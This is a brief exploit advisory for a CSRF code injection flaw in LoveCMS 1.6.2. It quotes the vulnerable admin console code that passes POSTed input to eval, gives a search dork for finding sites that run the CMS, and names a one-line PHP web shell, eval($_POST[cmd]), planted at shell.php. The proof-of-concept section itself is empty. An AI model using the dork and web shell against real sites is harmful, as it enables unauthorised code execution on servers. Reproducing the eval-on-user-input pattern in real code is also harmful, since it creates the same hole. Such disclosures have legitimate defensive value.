#Exploit Title : LoveCMS 1.6.2 - CSRF Code Injection Vulnerability #Script : LoveCMS 1.6.2 #Language : PHP #Download : http://sourceforge.net/project/showfiles.php?group_id=168535 #Date : 2010/12/27 #Dork : "Powered by LoveCMS" #Found : by hiphop #contact me :1444279564@qq.com source of /lovecms/system/admin/console.php 16: $code = stripslashes($_POST['phpcode']); 18: eval($code); POC:

LoveCMS 1.6.2 CSRF Code Injection Vulnerability

shell is php eval($_POST[cmd]); at /lovecms/system/admin/shell.php